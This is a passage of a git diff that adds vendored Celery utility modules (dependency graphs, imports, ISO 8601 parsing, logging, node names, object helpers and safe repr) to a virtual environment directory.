{dir} "{1}" [{attrs}]' + ATTRSEP = ', ' + DIRS = {'graph': '--', 'digraph': '->'} + TAIL = '{IN}}}' + + +class CycleError(Exception): + """A cycle was detected in an acyclic graph.""" + + +class DependencyGraph: + """A directed acyclic graph of objects and their dependencies. + + Supports a robust topological sort + to detect the order in which they must be handled. + + Takes an optional iterator of ``(obj, dependencies)`` + tuples to build the graph from. 
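+
+    Example (an illustrative sketch; the node names are arbitrary):
+        >>> graph = DependencyGraph([
+        ...     ('a', ['b', 'c']), ('b', []), ('c', ['b']),
+        ... ])
+        >>> graph.topsort()  # dependencies are ordered first
+        ['b', 'c', 'a']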
+ + Warning: + Does not support cycle detection. + """ + + def __init__(self, it=None, formatter=None): + self.formatter = formatter or GraphFormatter() + self.adjacent = {} + if it is not None: + self.update(it) + + def add_arc(self, obj): + """Add an object to the graph.""" + self.adjacent.setdefault(obj, []) + + def add_edge(self, A, B): + """Add an edge from object ``A`` to object ``B``. + + I.e. ``A`` depends on ``B``. + """ + self[A].append(B) + + def connect(self, graph): + """Add nodes from another graph.""" + self.adjacent.update(graph.adjacent) + + def topsort(self): + """Sort the graph topologically. + + Returns: + List: of objects in the order in which they must be handled. + """ + graph = DependencyGraph() + components = self._tarjan72() + + NC = { + node: component for component in components for node in component + } + for component in components: + graph.add_arc(component) + for node in self: + node_c = NC[node] + for successor in self[node]: + successor_c = NC[successor] + if node_c != successor_c: + graph.add_edge(node_c, successor_c) + return [t[0] for t in graph._khan62()] + + def valency_of(self, obj): + """Return the valency (degree) of a vertex in the graph.""" + try: + l = [len(self[obj])] + except KeyError: + return 0 + for node in self[obj]: + l.append(self.valency_of(node)) + return sum(l) + + def update(self, it): + """Update graph with data from a list of ``(obj, deps)`` tuples.""" + tups = list(it) + for obj, _ in tups: + self.add_arc(obj) + for obj, deps in tups: + for dep in deps: + self.add_edge(obj, dep) + + def edges(self): + """Return generator that yields for all edges in the graph.""" + return (obj for obj, adj in self.items() if adj) + + def _khan62(self): + """Perform Khan's simple topological sort algorithm from '62. + + See https://en.wikipedia.org/wiki/Topological_sorting + """ + count = Counter() + result = [] + + for node in self: + for successor in self[node]: + count[successor] += 1 + ready = [node for node in self if not count[node]] + + while ready: + node = ready.pop() + result.append(node) + + for successor in self[node]: + count[successor] -= 1 + if count[successor] == 0: + ready.append(successor) + result.reverse() + return result + + def _tarjan72(self): + """Perform Tarjan's algorithm to find strongly connected components. + + See Also: + :wikipedia:`Tarjan%27s_strongly_connected_components_algorithm` + """ + result, stack, low = [], [], {} + + def visit(node): + if node in low: + return + num = len(low) + low[node] = num + stack_pos = len(stack) + stack.append(node) + + for successor in self[node]: + visit(successor) + low[node] = min(low[node], low[successor]) + + if num == low[node]: + component = tuple(stack[stack_pos:]) + stack[stack_pos:] = [] + result.append(component) + for item in component: + low[item] = len(self) + + for node in self: + visit(node) + + return result + + def to_dot(self, fh, formatter=None): + """Convert the graph to DOT format. + + Arguments: + fh (IO): A file, or a file-like object to write the graph to. + formatter (celery.utils.graph.GraphFormatter): Custom graph + formatter to use. 
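+
+        Example (an illustrative sketch):
+            >>> import io
+            >>> buf = io.StringIO()
+            >>> DependencyGraph([('a', ['b']), ('b', [])]).to_dot(buf)
+            >>> 'digraph' in buf.getvalue()
+            True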
+ """ + seen = set() + draw = formatter or self.formatter + + def P(s): + print(bytes_to_str(s), file=fh) + + def if_not_seen(fun, obj): + if draw.label(obj) not in seen: + P(fun(obj)) + seen.add(draw.label(obj)) + + P(draw.head()) + for obj, adjacent in self.items(): + if not adjacent: + if_not_seen(draw.terminal_node, obj) + for req in adjacent: + if_not_seen(draw.node, obj) + P(draw.edge(obj, req)) + P(draw.tail()) + + def format(self, obj): + return self.formatter(obj) if self.formatter else obj + + def __iter__(self): + return iter(self.adjacent) + + def __getitem__(self, node): + return self.adjacent[node] + + def __len__(self): + return len(self.adjacent) + + def __contains__(self, obj): + return obj in self.adjacent + + def _iterate_items(self): + return self.adjacent.items() + items = iteritems = _iterate_items + + def __repr__(self): + return '\n'.join(self.repr_node(N) for N in self) + + def repr_node(self, obj, level=1, fmt='{0}({1})'): + output = [fmt.format(obj, self.valency_of(obj))] + if obj in self: + for other in self[obj]: + d = fmt.format(other, self.valency_of(other)) + output.append(' ' * level + d) + output.extend(self.repr_node(other, level + 1).split('\n')[1:]) + return '\n'.join(output) + + +class GraphFormatter: + """Format dependency graphs.""" + + _attr = DOT.ATTR.strip() + _node = DOT.NODE.strip() + _edge = DOT.EDGE.strip() + _head = DOT.HEAD.strip() + _tail = DOT.TAIL.strip() + _attrsep = DOT.ATTRSEP + _dirs = dict(DOT.DIRS) + + scheme = { + 'shape': 'box', + 'arrowhead': 'vee', + 'style': 'filled', + 'fontname': 'HelveticaNeue', + } + edge_scheme = { + 'color': 'darkseagreen4', + 'arrowcolor': 'black', + 'arrowsize': 0.7, + } + node_scheme = {'fillcolor': 'palegreen3', 'color': 'palegreen4'} + term_scheme = {'fillcolor': 'palegreen1', 'color': 'palegreen2'} + graph_scheme = {'bgcolor': 'mintcream'} + + def __init__(self, root=None, type=None, id=None, + indent=0, inw=' ' * 4, **scheme): + self.id = id or 'dependencies' + self.root = root + self.type = type or 'digraph' + self.direction = self._dirs[self.type] + self.IN = inw * (indent or 0) + self.INp = self.IN + inw + self.scheme = dict(self.scheme, **scheme) + self.graph_scheme = dict(self.graph_scheme, root=self.label(self.root)) + + def attr(self, name, value): + value = f'"{value}"' + return self.FMT(self._attr, name=name, value=value) + + def attrs(self, d, scheme=None): + d = dict(self.scheme, **dict(scheme, **d or {}) if scheme else d) + return self._attrsep.join( + safe_str(self.attr(k, v)) for k, v in d.items() + ) + + def head(self, **attrs): + return self.FMT( + self._head, id=self.id, type=self.type, + attrs=self.attrs(attrs, self.graph_scheme), + ) + + def tail(self): + return self.FMT(self._tail) + + def label(self, obj): + return obj + + def node(self, obj, **attrs): + return self.draw_node(obj, self.node_scheme, attrs) + + def terminal_node(self, obj, **attrs): + return self.draw_node(obj, self.term_scheme, attrs) + + def edge(self, a, b, **attrs): + return self.draw_edge(a, b, **attrs) + + def _enc(self, s): + return s.encode('utf-8', 'ignore') + + def FMT(self, fmt, *args, **kwargs): + return self._enc(fmt.format( + *args, **dict(kwargs, IN=self.IN, INp=self.INp) + )) + + def draw_edge(self, a, b, scheme=None, attrs=None): + return self.FMT( + self._edge, self.label(a), self.label(b), + dir=self.direction, attrs=self.attrs(attrs, self.edge_scheme), + ) + + def draw_node(self, obj, scheme=None, attrs=None): + return self.FMT( + self._node, self.label(obj), attrs=self.attrs(attrs, scheme), + 
) diff --git a/env/Lib/site-packages/celery/utils/imports.py b/env/Lib/site-packages/celery/utils/imports.py new file mode 100644 index 00000000..390b22ce --- /dev/null +++ b/env/Lib/site-packages/celery/utils/imports.py @@ -0,0 +1,163 @@ +"""Utilities related to importing modules and symbols by name.""" +import os +import sys +import warnings +from contextlib import contextmanager +from importlib import import_module, reload + +try: + from importlib.metadata import entry_points +except ImportError: + from importlib_metadata import entry_points + +from kombu.utils.imports import symbol_by_name + +#: Billiard sets this when execv is enabled. +#: We use it to find out the name of the original ``__main__`` +#: module, so that we can properly rewrite the name of the +#: task to be that of ``App.main``. +MP_MAIN_FILE = os.environ.get('MP_MAIN_FILE') + +__all__ = ( + 'NotAPackage', 'qualname', 'instantiate', 'symbol_by_name', + 'cwd_in_path', 'find_module', 'import_from_cwd', + 'reload_from_cwd', 'module_file', 'gen_task_name', +) + + +class NotAPackage(Exception): + """Raised when importing a package, but it's not a package.""" + + +def qualname(obj): + """Return object name.""" + if not hasattr(obj, '__name__') and hasattr(obj, '__class__'): + obj = obj.__class__ + q = getattr(obj, '__qualname__', None) + if '.' not in q: + q = '.'.join((obj.__module__, q)) + return q + + +def instantiate(name, *args, **kwargs): + """Instantiate class by name. + + See Also: + :func:`symbol_by_name`. + """ + return symbol_by_name(name)(*args, **kwargs) + + +@contextmanager +def cwd_in_path(): + """Context adding the current working directory to sys.path.""" + cwd = os.getcwd() + if cwd in sys.path: + yield + else: + sys.path.insert(0, cwd) + try: + yield cwd + finally: + try: + sys.path.remove(cwd) + except ValueError: # pragma: no cover + pass + + +def find_module(module, path=None, imp=None): + """Version of :func:`imp.find_module` supporting dots.""" + if imp is None: + imp = import_module + with cwd_in_path(): + try: + return imp(module) + except ImportError: + # Raise a more specific error if the problem is that one of the + # dot-separated segments of the module name is not a package. + if '.' in module: + parts = module.split('.') + for i, part in enumerate(parts[:-1]): + package = '.'.join(parts[:i + 1]) + try: + mpart = imp(package) + except ImportError: + # Break out and re-raise the original ImportError + # instead. + break + try: + mpart.__path__ + except AttributeError: + raise NotAPackage(package) + raise + + +def import_from_cwd(module, imp=None, package=None): + """Import module, temporarily including modules in the current directory. + + Modules located in the current directory has + precedence over modules located in `sys.path`. 
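+
+    Example (illustrative; the module name is hypothetical):
+        >>> tasks = import_from_cwd('tasks')  # prefers ./tasks.py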
+ """ + if imp is None: + imp = import_module + with cwd_in_path(): + return imp(module, package=package) + + +def reload_from_cwd(module, reloader=None): + """Reload module (ensuring that CWD is in sys.path).""" + if reloader is None: + reloader = reload + with cwd_in_path(): + return reloader(module) + + +def module_file(module): + """Return the correct original file name of a module.""" + name = module.__file__ + return name[:-1] if name.endswith('.pyc') else name + + +def gen_task_name(app, name, module_name): + """Generate task name from name/module pair.""" + module_name = module_name or '__main__' + try: + module = sys.modules[module_name] + except KeyError: + # Fix for manage.py shell_plus (Issue #366) + module = None + + if module is not None: + module_name = module.__name__ + # - If the task module is used as the __main__ script + # - we need to rewrite the module part of the task name + # - to match App.main. + if MP_MAIN_FILE and module.__file__ == MP_MAIN_FILE: + # - see comment about :envvar:`MP_MAIN_FILE` above. + module_name = '__main__' + if module_name == '__main__' and app.main: + return '.'.join([app.main, name]) + return '.'.join(p for p in (module_name, name) if p) + + +def load_extension_class_names(namespace): + if sys.version_info >= (3, 10): + _entry_points = entry_points(group=namespace) + else: + try: + _entry_points = entry_points().get(namespace, []) + except AttributeError: + _entry_points = entry_points().select(group=namespace) + for ep in _entry_points: + yield ep.name, ep.value + + +def load_extension_classes(namespace): + for name, class_name in load_extension_class_names(namespace): + try: + cls = symbol_by_name(class_name) + except (ImportError, SyntaxError) as exc: + warnings.warn( + f'Cannot load {namespace} extension {class_name!r}: {exc!r}') + else: + yield name, cls diff --git a/env/Lib/site-packages/celery/utils/iso8601.py b/env/Lib/site-packages/celery/utils/iso8601.py new file mode 100644 index 00000000..ffe342b4 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/iso8601.py @@ -0,0 +1,76 @@ +"""Parse ISO8601 dates. + +Originally taken from :pypi:`pyiso8601` +(https://bitbucket.org/micktwomey/pyiso8601) + +Modified to match the behavior of ``dateutil.parser``: + + - raise :exc:`ValueError` instead of ``ParseError`` + - return naive :class:`~datetime.datetime` by default + +This is the original License: + +Copyright (c) 2007 Michael Twomey + +Permission is hereby granted, free of charge, to any person obtaining a +copy of this software and associated documentation files (the +"Software"), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sub-license, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be included +in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS +OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
+""" +import re +from datetime import datetime, timedelta, timezone + +from celery.utils.deprecated import warn + +__all__ = ('parse_iso8601',) + +# Adapted from http://delete.me.uk/2005/03/iso8601.html +ISO8601_REGEX = re.compile( + r'(?P[0-9]{4})(-(?P[0-9]{1,2})(-(?P[0-9]{1,2})' + r'((?P.)(?P[0-9]{2}):(?P[0-9]{2})' + r'(:(?P[0-9]{2})(\.(?P[0-9]+))?)?' + r'(?PZ|(([-+])([0-9]{2}):([0-9]{2})))?)?)?)?' +) +TIMEZONE_REGEX = re.compile( + r'(?P[+-])(?P[0-9]{2}).(?P[0-9]{2})' +) + + +def parse_iso8601(datestring): + """Parse and convert ISO-8601 string to datetime.""" + warn("parse_iso8601", "v5.3", "v6", "datetime.datetime.fromisoformat") + m = ISO8601_REGEX.match(datestring) + if not m: + raise ValueError('unable to parse date string %r' % datestring) + groups = m.groupdict() + tz = groups['timezone'] + if tz == 'Z': + tz = timezone(timedelta(0)) + elif tz: + m = TIMEZONE_REGEX.match(tz) + prefix, hours, minutes = m.groups() + hours, minutes = int(hours), int(minutes) + if prefix == '-': + hours = -hours + minutes = -minutes + tz = timezone(timedelta(minutes=minutes, hours=hours)) + return datetime( + int(groups['year']), int(groups['month']), + int(groups['day']), int(groups['hour'] or 0), + int(groups['minute'] or 0), int(groups['second'] or 0), + int(groups['fraction'] or 0), tz + ) diff --git a/env/Lib/site-packages/celery/utils/log.py b/env/Lib/site-packages/celery/utils/log.py new file mode 100644 index 00000000..4e8fc11f --- /dev/null +++ b/env/Lib/site-packages/celery/utils/log.py @@ -0,0 +1,295 @@ +"""Logging utilities.""" +import logging +import numbers +import os +import sys +import threading +import traceback +from contextlib import contextmanager +from typing import AnyStr, Sequence # noqa + +from kombu.log import LOG_LEVELS +from kombu.log import get_logger as _get_logger +from kombu.utils.encoding import safe_str + +from .term import colored + +__all__ = ( + 'ColorFormatter', 'LoggingProxy', 'base_logger', + 'set_in_sighandler', 'in_sighandler', 'get_logger', + 'get_task_logger', 'mlevel', + 'get_multiprocessing_logger', 'reset_multiprocessing_logger', 'LOG_LEVELS' +) + +_process_aware = False +_in_sighandler = False + +MP_LOG = os.environ.get('MP_LOG', False) + +RESERVED_LOGGER_NAMES = {'celery', 'celery.task'} + +# Sets up our logging hierarchy. +# +# Every logger in the celery package inherits from the "celery" +# logger, and every task logger inherits from the "celery.task" +# logger. 
+base_logger = logger = _get_logger('celery')
+
+
+def set_in_sighandler(value):
+    """Set flag signifying that we're inside a signal handler."""
+    global _in_sighandler
+    _in_sighandler = value
+
+
+def iter_open_logger_fds():
+    seen = set()
+    loggers = (list(logging.Logger.manager.loggerDict.values()) +
+               [logging.getLogger(None)])
+    for l in loggers:
+        try:
+            for handler in l.handlers:
+                try:
+                    if handler not in seen:  # pragma: no cover
+                        yield handler.stream
+                        seen.add(handler)
+                except AttributeError:
+                    pass
+        except AttributeError:  # PlaceHolder does not have handlers
+            pass
+
+
+@contextmanager
+def in_sighandler():
+    """Context that records that we are in a signal handler."""
+    set_in_sighandler(True)
+    try:
+        yield
+    finally:
+        set_in_sighandler(False)
+
+
+def logger_isa(l, p, max=1000):
+    this, seen = l, set()
+    for _ in range(max):
+        if this == p:
+            return True
+        else:
+            if this in seen:
+                raise RuntimeError(
+                    f'Logger {l.name!r} parents recursive',
+                )
+            seen.add(this)
+            this = this.parent
+            if not this:
+                break
+    else:  # pragma: no cover
+        raise RuntimeError(f'Logger hierarchy exceeds {max}')
+    return False
+
+
+def _using_logger_parent(parent_logger, logger_):
+    if not logger_isa(logger_, parent_logger):
+        logger_.parent = parent_logger
+    return logger_
+
+
+def get_logger(name):
+    """Get logger by name."""
+    l = _get_logger(name)
+    if logging.root not in (l, l.parent) and l is not base_logger:
+        l = _using_logger_parent(base_logger, l)
+    return l
+
+
+task_logger = get_logger('celery.task')
+worker_logger = get_logger('celery.worker')
+
+
+def get_task_logger(name):
+    """Get logger for task module by name."""
+    if name in RESERVED_LOGGER_NAMES:
+        raise RuntimeError(f'Logger name {name!r} is reserved!')
+    return _using_logger_parent(task_logger, get_logger(name))
+
+
+def mlevel(level):
+    """Convert level name/int to log level."""
+    if level and not isinstance(level, numbers.Integral):
+        return LOG_LEVELS[level.upper()]
+    return level
+
+
+class ColorFormatter(logging.Formatter):
+    """Logging formatter that adds colors based on severity."""
+
+    #: Loglevel -> Color mapping.
+    COLORS = colored().names
+    colors = {
+        'DEBUG': COLORS['blue'],
+        'WARNING': COLORS['yellow'],
+        'ERROR': COLORS['red'],
+        'CRITICAL': COLORS['magenta'],
+    }
+
+    def __init__(self, fmt=None, use_color=True):
+        super().__init__(fmt)
+        self.use_color = use_color
+
+    def formatException(self, ei):
+        if ei and not isinstance(ei, tuple):
+            ei = sys.exc_info()
+        r = super().formatException(ei)
+        return r
+
+    def format(self, record):
+        msg = super().format(record)
+        color = self.colors.get(record.levelname)
+
+        # reset exception info later for other handlers...
+        einfo = sys.exc_info() if record.exc_info == 1 else record.exc_info
+
+        if color and self.use_color:
+            try:
+                # safe_str will repr the color object
+                # and color will break on non-string objects
+                # so need to reorder calls based on type.
+                # Issue #427
+                try:
+                    if isinstance(msg, str):
+                        return str(color(safe_str(msg)))
+                    return safe_str(color(msg))
+                except UnicodeDecodeError:  # pragma: no cover
+                    return safe_str(msg)  # skip colors
+            except Exception as exc:  # pylint: disable=broad-except
+                prev_msg, record.exc_info, record.msg = (
+                    record.msg, 1, '<Unrepresentable {!r}: {!r}>'.format(
+                        type(msg), exc
+                    ),
+                )
+                try:
+                    return super().format(record)
+                finally:
+                    record.msg, record.exc_info = prev_msg, einfo
+        else:
+            return safe_str(msg)
+
+
+class LoggingProxy:
+    """Forward file object to :class:`logging.Logger` instance.
+ + Arguments: + logger (~logging.Logger): Logger instance to forward to. + loglevel (int, str): Log level to use when logging messages. + """ + + mode = 'w' + name = None + closed = False + loglevel = logging.ERROR + _thread = threading.local() + + def __init__(self, logger, loglevel=None): + # pylint: disable=redefined-outer-name + # Note that the logger global is redefined here, be careful changing. + self.logger = logger + self.loglevel = mlevel(loglevel or self.logger.level or self.loglevel) + self._safewrap_handlers() + + def _safewrap_handlers(self): + # Make the logger handlers dump internal errors to + # :data:`sys.__stderr__` instead of :data:`sys.stderr` to circumvent + # infinite loops. + + def wrap_handler(handler): # pragma: no cover + + class WithSafeHandleError(logging.Handler): + + def handleError(self, record): + try: + traceback.print_exc(None, sys.__stderr__) + except OSError: + pass # see python issue 5971 + + handler.handleError = WithSafeHandleError().handleError + return [wrap_handler(h) for h in self.logger.handlers] + + def write(self, data): + # type: (AnyStr) -> int + """Write message to logging object.""" + if _in_sighandler: + safe_data = safe_str(data) + print(safe_data, file=sys.__stderr__) + return len(safe_data) + if getattr(self._thread, 'recurse_protection', False): + # Logger is logging back to this file, so stop recursing. + return 0 + if data and not self.closed: + self._thread.recurse_protection = True + try: + safe_data = safe_str(data).rstrip('\n') + if safe_data: + self.logger.log(self.loglevel, safe_data) + return len(safe_data) + finally: + self._thread.recurse_protection = False + return 0 + + def writelines(self, sequence): + # type: (Sequence[str]) -> None + """Write list of strings to file. + + The sequence can be any iterable object producing strings. + This is equivalent to calling :meth:`write` for each string. + """ + for part in sequence: + self.write(part) + + def flush(self): + # This object is not buffered so any :meth:`flush` + # requests are ignored. + pass + + def close(self): + # when the object is closed, no write requests are + # forwarded to the logging object anymore. + self.closed = True + + def isatty(self): + """Here for file support.""" + return False + + +def get_multiprocessing_logger(): + """Return the multiprocessing logger.""" + try: + from billiard import util + except ImportError: + pass + else: + return util.get_logger() + + +def reset_multiprocessing_logger(): + """Reset multiprocessing logging setup.""" + try: + from billiard import util + except ImportError: + pass + else: + if hasattr(util, '_logger'): # pragma: no cover + util._logger = None + + +def current_process(): + try: + from billiard import process + except ImportError: + pass + else: + return process.current_process() + + +def current_process_index(base=1): + index = getattr(current_process(), 'index', None) + return index + base if index is not None else index diff --git a/env/Lib/site-packages/celery/utils/nodenames.py b/env/Lib/site-packages/celery/utils/nodenames.py new file mode 100644 index 00000000..b3d1a522 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/nodenames.py @@ -0,0 +1,102 @@ +"""Worker name utilities.""" +import os +import socket +from functools import partial + +from kombu.entity import Exchange, Queue + +from .functional import memoize +from .text import simple_format + +#: Exchange for worker direct queues. +WORKER_DIRECT_EXCHANGE = Exchange('C.dq2') + +#: Format for worker direct queue names. 
+WORKER_DIRECT_QUEUE_FORMAT = '{hostname}.dq2' + +#: Separator for worker node name and hostname. +NODENAME_SEP = '@' + +NODENAME_DEFAULT = 'celery' + +gethostname = memoize(1, Cache=dict)(socket.gethostname) + +__all__ = ( + 'worker_direct', 'gethostname', 'nodename', + 'anon_nodename', 'nodesplit', 'default_nodename', + 'node_format', 'host_format', +) + + +def worker_direct(hostname): + """Return the :class:`kombu.Queue` being a direct route to a worker. + + Arguments: + hostname (str, ~kombu.Queue): The fully qualified node name of + a worker (e.g., ``w1@example.com``). If passed a + :class:`kombu.Queue` instance it will simply return + that instead. + """ + if isinstance(hostname, Queue): + return hostname + return Queue( + WORKER_DIRECT_QUEUE_FORMAT.format(hostname=hostname), + WORKER_DIRECT_EXCHANGE, + hostname, + ) + + +def nodename(name, hostname): + """Create node name from name/hostname pair.""" + return NODENAME_SEP.join((name, hostname)) + + +def anon_nodename(hostname=None, prefix='gen'): + """Return the nodename for this process (not a worker). + + This is used for e.g. the origin task message field. + """ + return nodename(''.join([prefix, str(os.getpid())]), + hostname or gethostname()) + + +def nodesplit(name): + """Split node name into tuple of name/hostname.""" + parts = name.split(NODENAME_SEP, 1) + if len(parts) == 1: + return None, parts[0] + return parts + + +def default_nodename(hostname): + """Return the default nodename for this process.""" + name, host = nodesplit(hostname or '') + return nodename(name or NODENAME_DEFAULT, host or gethostname()) + + +def node_format(s, name, **extra): + """Format worker node name (name@host.com).""" + shortname, host = nodesplit(name) + return host_format( + s, host, shortname or NODENAME_DEFAULT, p=name, **extra) + + +def _fmt_process_index(prefix='', default='0'): + from .log import current_process_index + index = current_process_index() + return f'{prefix}{index}' if index else default + + +_fmt_process_index_with_prefix = partial(_fmt_process_index, '-', '') + + +def host_format(s, host=None, name=None, **extra): + """Format host %x abbreviations.""" + host = host or gethostname() + hname, _, domain = host.partition('.') + name = name or hname + keys = dict({ + 'h': host, 'n': name, 'd': domain, + 'i': _fmt_process_index, 'I': _fmt_process_index_with_prefix, + }, **extra) + return simple_format(s, keys) diff --git a/env/Lib/site-packages/celery/utils/objects.py b/env/Lib/site-packages/celery/utils/objects.py new file mode 100644 index 00000000..56e96ffd --- /dev/null +++ b/env/Lib/site-packages/celery/utils/objects.py @@ -0,0 +1,142 @@ +"""Object related utilities, including introspection, etc.""" +from functools import reduce + +__all__ = ('Bunch', 'FallbackContext', 'getitem_property', 'mro_lookup') + + +class Bunch: + """Object that enables you to modify attributes.""" + + def __init__(self, **kwargs): + self.__dict__.update(kwargs) + + +def mro_lookup(cls, attr, stop=None, monkey_patched=None): + """Return the first node by MRO order that defines an attribute. + + Arguments: + cls (Any): Child class to traverse. + attr (str): Name of attribute to find. + stop (Set[Any]): A set of types that if reached will stop + the search. + monkey_patched (Sequence): Use one of the stop classes + if the attributes module origin isn't in this list. + Used to detect monkey patched attributes. + + Returns: + Any: The attribute value, or :const:`None` if not found. 
+    """
+    stop = set() if not stop else stop
+    monkey_patched = [] if not monkey_patched else monkey_patched
+    for node in cls.mro():
+        if node in stop:
+            try:
+                value = node.__dict__[attr]
+                module_origin = value.__module__
+            except (AttributeError, KeyError):
+                pass
+            else:
+                if module_origin not in monkey_patched:
+                    return node
+            return
+        if attr in node.__dict__:
+            return node
+
+
+class FallbackContext:
+    """Context workaround.
+
+    The built-in ``@contextmanager`` utility does not work well
+    when wrapping other contexts, as the traceback is wrong when
+    the wrapped context raises.
+
+    This solves this problem and can be used instead of ``@contextmanager``
+    in this example::
+
+        @contextmanager
+        def connection_or_default_connection(connection=None):
+            if connection:
+                # user already has a connection, shouldn't close
+                # after use
+                yield connection
+            else:
+                # must've new connection, and also close the connection
+                # after the block returns
+                with create_new_connection() as connection:
+                    yield connection
+
+    This wrapper can be used instead for the above like this::
+
+        def connection_or_default_connection(connection=None):
+            return FallbackContext(connection, create_new_connection)
+    """
+
+    def __init__(self, provided, fallback, *fb_args, **fb_kwargs):
+        self.provided = provided
+        self.fallback = fallback
+        self.fb_args = fb_args
+        self.fb_kwargs = fb_kwargs
+        self._context = None
+
+    def __enter__(self):
+        if self.provided is not None:
+            return self.provided
+        context = self._context = self.fallback(
+            *self.fb_args, **self.fb_kwargs
+        ).__enter__()
+        return context
+
+    def __exit__(self, *exc_info):
+        if self._context is not None:
+            return self._context.__exit__(*exc_info)
+
+
+class getitem_property:
+    """Attribute -> dict key descriptor.
+
+    The target object must support ``__getitem__``,
+    and optionally ``__setitem__``.
+
+    Example:
+        >>> from collections import defaultdict
+
+        >>> class Me(dict):
+        ...     deep = defaultdict(dict)
+        ...
+        ...     foo = _getitem_property('foo')
+        ...     deep_thing = _getitem_property('deep.thing')
+
+
+        >>> me = Me()
+        >>> me.foo
+        None
+
+        >>> me.foo = 10
+        >>> me.foo
+        10
+        >>> me['foo']
+        10
+
+        >>> me.deep_thing = 42
+        >>> me.deep_thing
+        42
+        >>> me.deep
+        defaultdict(<class 'dict'>, {'thing': 42})
+    """
+
+    def __init__(self, keypath, doc=None):
+        path, _, self.key = keypath.rpartition('.')
+        self.path = path.split('.') if path else None
+        self.__doc__ = doc
+
+    def _path(self, obj):
+        return (reduce(lambda d, k: d[k], [obj] + self.path) if self.path
+                else obj)
+
+    def __get__(self, obj, type=None):
+        if obj is None:
+            return type
+        return self._path(obj).get(self.key)
+
+    def __set__(self, obj, value):
+        self._path(obj)[self.key] = value
diff --git a/env/Lib/site-packages/celery/utils/saferepr.py b/env/Lib/site-packages/celery/utils/saferepr.py
new file mode 100644
index 00000000..feddd41f
--- /dev/null
+++ b/env/Lib/site-packages/celery/utils/saferepr.py
@@ -0,0 +1,266 @@
+"""Streaming, truncating, non-recursive version of :func:`repr`.
+
+Differences from regular :func:`repr`:
+
+- Sets are represented the Python 3 way: ``{1, 2}`` vs ``set([1, 2])``.
+- Unicode strings does not have the ``u'`` prefix, even on Python 2.
+- Empty set formatted as ``set()`` (Python 3), not ``set([])`` (Python 2).
+- Longs don't have the ``L`` suffix.
+
+Very slow with no limits, super quick with limits.
+""" +import traceback +from collections import deque, namedtuple +from decimal import Decimal +from itertools import chain +from numbers import Number +from pprint import _recursion +from typing import Any, AnyStr, Callable, Dict, Iterator, List, Sequence, Set, Tuple # noqa + +from .text import truncate + +__all__ = ('saferepr', 'reprstream') + +#: Node representing literal text. +#: - .value: is the literal text value +#: - .truncate: specifies if this text can be truncated, for things like +#: LIT_DICT_END this will be False, as we always display +#: the ending brackets, e.g: [[[1, 2, 3, ...,], ..., ]] +#: - .direction: If +1 the current level is increment by one, +#: if -1 the current level is decremented by one, and +#: if 0 the current level is unchanged. +_literal = namedtuple('_literal', ('value', 'truncate', 'direction')) + +#: Node representing a dictionary key. +_key = namedtuple('_key', ('value',)) + +#: Node representing quoted text, e.g. a string value. +_quoted = namedtuple('_quoted', ('value',)) + + +#: Recursion protection. +_dirty = namedtuple('_dirty', ('objid',)) + +#: Types that are repsented as chars. +chars_t = (bytes, str) + +#: Types that are regarded as safe to call repr on. +safe_t = (Number,) + +#: Set types. +set_t = (frozenset, set) + +LIT_DICT_START = _literal('{', False, +1) +LIT_DICT_KVSEP = _literal(': ', True, 0) +LIT_DICT_END = _literal('}', False, -1) +LIT_LIST_START = _literal('[', False, +1) +LIT_LIST_END = _literal(']', False, -1) +LIT_LIST_SEP = _literal(', ', True, 0) +LIT_SET_START = _literal('{', False, +1) +LIT_SET_END = _literal('}', False, -1) +LIT_TUPLE_START = _literal('(', False, +1) +LIT_TUPLE_END = _literal(')', False, -1) +LIT_TUPLE_END_SV = _literal(',)', False, -1) + + +def saferepr(o, maxlen=None, maxlevels=3, seen=None): + # type: (Any, int, int, Set) -> str + """Safe version of :func:`repr`. + + Warning: + Make sure you set the maxlen argument, or it will be very slow + for recursive objects. With the maxlen set, it's often faster + than built-in repr. + """ + return ''.join(_saferepr( + o, maxlen=maxlen, maxlevels=maxlevels, seen=seen + )) + + +def _chaindict(mapping, + LIT_DICT_KVSEP=LIT_DICT_KVSEP, + LIT_LIST_SEP=LIT_LIST_SEP): + # type: (Dict, _literal, _literal) -> Iterator[Any] + size = len(mapping) + for i, (k, v) in enumerate(mapping.items()): + yield _key(k) + yield LIT_DICT_KVSEP + yield v + if i < (size - 1): + yield LIT_LIST_SEP + + +def _chainlist(it, LIT_LIST_SEP=LIT_LIST_SEP): + # type: (List) -> Iterator[Any] + size = len(it) + for i, v in enumerate(it): + yield v + if i < (size - 1): + yield LIT_LIST_SEP + + +def _repr_empty_set(s): + # type: (Set) -> str + return f'{type(s).__name__}()' + + +def _safetext(val): + # type: (AnyStr) -> str + if isinstance(val, bytes): + try: + val.encode('utf-8') + except UnicodeDecodeError: + # is bytes with unrepresentable characters, attempt + # to convert back to unicode + return val.decode('utf-8', errors='backslashreplace') + return val + + +def _format_binary_bytes(val, maxlen, ellipsis='...'): + # type: (bytes, int, str) -> str + if maxlen and len(val) > maxlen: + # we don't want to copy all the data, just take what we need. 
+        chunk = memoryview(val)[:maxlen].tobytes()
+        return _bytes_prefix(f"'{_repr_binary_bytes(chunk)}{ellipsis}'")
+    return _bytes_prefix(f"'{_repr_binary_bytes(val)}'")
+
+
+def _bytes_prefix(s):
+    return 'b' + s
+
+
+def _repr_binary_bytes(val):
+    # type: (bytes) -> str
+    try:
+        return val.decode('utf-8')
+    except UnicodeDecodeError:
+        # possibly not unicode, but binary data so format as hex.
+        return val.hex()
+
+
+def _format_chars(val, maxlen):
+    # type: (AnyStr, int) -> str
